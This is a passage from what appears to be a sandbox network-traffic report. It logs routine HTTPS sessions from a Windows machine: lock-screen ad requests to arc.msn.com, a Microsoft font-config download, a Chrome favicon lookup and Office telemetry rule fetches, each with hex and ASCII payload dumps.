V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49737	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:44 UTC	2587	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085340Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=cd56d114a28c43d1a3bf228764877a3a&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-280815&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p= Cache-Control: no-cache MS-CV: SHdyyAU7fkyVYamz.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-21 08:53:45 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2939 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: K05cV9KM6ZV055mJ5oEDltMkGqxFpIvODkMfFUCLu4cSJ0mD9sAlUTQyGWUuE3ePoLWJRu2qPjBIbIgdjmo4Cl1okRmLoE6CLStfW9lsNM4rD32M/x5CtOgkZ0zGOkoYrr6abuKr9Uap0xRK8P4UcawTH8MBxDYW6h7WxIj0yTmSMpKjIFjK+KGza4xHpP3mq+VpoRDJSNejQb3/VcpNgr6xt7PPjSNQD1Ck5eJiOQZw1qDnnpiPvCwBMsp2/R/TFpgx1kYImg4of16msOkvl+WkXL1ApRH5g3MNdRFc1aY+nQNOw+bchPt4xm+v/57iNw4CdHwaVI168suBOAy3Sg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:44 GMT Connection: close
2024-11-21 08:53:45 UTC	2939	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49738	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:44 UTC	2604	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085340Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0809f47c32d84571a782a8378f879297&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-338387&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p= Cache-Control: no-cache MS-CV: SHdyyAU7fkyVYamz.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-21 08:53:45 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 25011 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: bYMcZ++Pf84sZIZ9+xS13rN1V7qTToOBfQ94EKDkP57GRhfIFWMwSVB+xWLUqXsVk/+uWue/1SsPDvVpZb2uVVcPf/pKuMf9V11N8vir+1Krp4lB6cWUHXVQpcaMyUt4Q4tg2ADc4yrveulCUOcSCd+sviN3WWSollfJbC/SkuPHq0EYCEr6wI+mziWJsAjrbUYRy4o5pFKcVjxXd9/pwteasZMjliOvy6dGeRR+SyLbkBVB2m4sdCAEUCoKqeSNuU6KZ8fBbT8JPrX0O3jTKILlppdWZ2kFVf7asD0QUUs/AOKK8/Sb2zCXkuQdUS8ZvAeWlToS03nHMzjg8+RZrg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:45 GMT Connection: close
2024-11-21 08:53:45 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-11-21 08:53:45 UTC	9442	IN	Data Raw: 5c 75 30 30 32 36 43 49 44 3d 35 33 31 33 34 34 37 30 38 5c 5c 75 30 30 32 36 45 49 44 3d 7b 45 49 44 7d 5c 5c 75 30 30 32 36 74 69 64 73 3d 31 35 30 30 31 5c 5c 75 30 30 32 36 61 64 55 6e 69 74 49 64 3d 31 31 37 33 30 35 39 38 5c 5c 75 30 30 32 36 6c 6f 63 61 6c 49 64 3d 77 3a 30 36 38 44 34 38 32 44 2d 38 46 33 42 2d 37 38 41 45 2d 44 41 41 30 2d 30 43 30 38 42 38 46 46 32 41 45 36 5c 5c 75 30 30 32 36 64 65 76 69 63 65 49 64 3d 36 39 36 36 35 35 35 33 32 30 39 31 32 37 33 35 5c 5c 75 30 30 32 36 61 6e 69 64 3d 44 41 31 38 43 38 38 32 35 33 35 36 42 41 43 34 45 37 42 32 33 30 36 36 46 46 46 46 46 46 46 46 5c 5c 75 30 30 32 36 69 74 65 6d 49 6e 64 65 78 3d 31 5c 22 7d 5d 7d 2c 5c 22 74 72 69 67 67 65 72 73 5c 22 3a 5b 5d 7d 5d 7d 2c 5c 22 70 72 6d 5c 22 Data Ascii: \u0026CID=531344708\\u0026EID={EID}\\u0026tids=15001\\u0026adUnitId=11730598\\u0026localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6\\u0026deviceId=6966555320912735\\u0026anid=DA18C8825356BAC4E7B23066FFFFFFFF\\u0026itemIndex=1\"}]},\"triggers\":[]}]},\"prm\"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49739	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:44 UTC	2594	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085340Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9502a067c1d54f728de9327c33815794&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-338388&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p= Cache-Control: no-cache MS-CV: SHdyyAU7fkyVYamz.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-21 08:53:45 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 3606 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: RbWuXvjGJ6TexHKeWnn+hjRHA+JgE8R88M/WPdl3wir+AAvMM7kz83CbidOFP/ZVhu3FVYtoz40KsAZgu9RAI2VpIYchkj/t+F3dFHQTfFQgdXFg5l3dgcCmUJfiYRQdMWyNC0AIruJV1VvoqnejXKUJz7x5tJtLC8Lk757bdsWXpT4kJ0MCjke9RV/77GWuoKTQTEnA8GeeE80mgzhRfgA/K+u3JHj1UUG3UnpLBK/b7q+Mc95Lagm4HVt/pRYcDwACIctTUYqojWxJVqr+WLBIBwAFncsi7CXgXJOFKi5jZqUu5IZraS2rZwhJHm3eCeossdkvb9HH6OethFNVBA== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:44 GMT Connection: close
2024-11-21 08:53:45 UTC	3606	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49740	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-21 08:53:45 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=201065 Date: Thu, 21 Nov 2024 08:53:45 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-21 08:53:45 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49748	142.250.186.100	443	2672	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	691	OUT	GET /s2/favicons?domain=idcom-france.com HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://voyages-moinschers.fr/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-21 08:53:46 UTC	498	IN	HTTP/1.1 301 Moved Permanently Location: https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://idcom-france.com&size=16 X-Content-Type-Options: nosniff Server: sffe Content-Length: 336 X-XSS-Protection: 0 Date: Thu, 21 Nov 2024 08:49:31 GMT Expires: Thu, 21 Nov 2024 09:19:31 GMT Cache-Control: public, max-age=1800 Content-Type: text/html; charset=UTF-8 Age: 254 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-21 08:53:46 UTC	336	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 30 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 56 32 3f 63 6c 69 65 6e 74 3d 53 4f 43 49 41 4c 26 61 6d 70 3b 74 79 70 65 3d 46 41 56 49 43 4f 4e 26 61 6d 70 3b 66 61 6c 6c 62 61 63 6b 5f 6f 70 74 73 3d 54 59 50 45 2c Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.6	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:46 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:45 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: b54876a2-a01e-0070-6764-3b573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085345Z-178bfbc474bmqmgjhC1NYCy16c000000018000000000b0dh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:46 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" 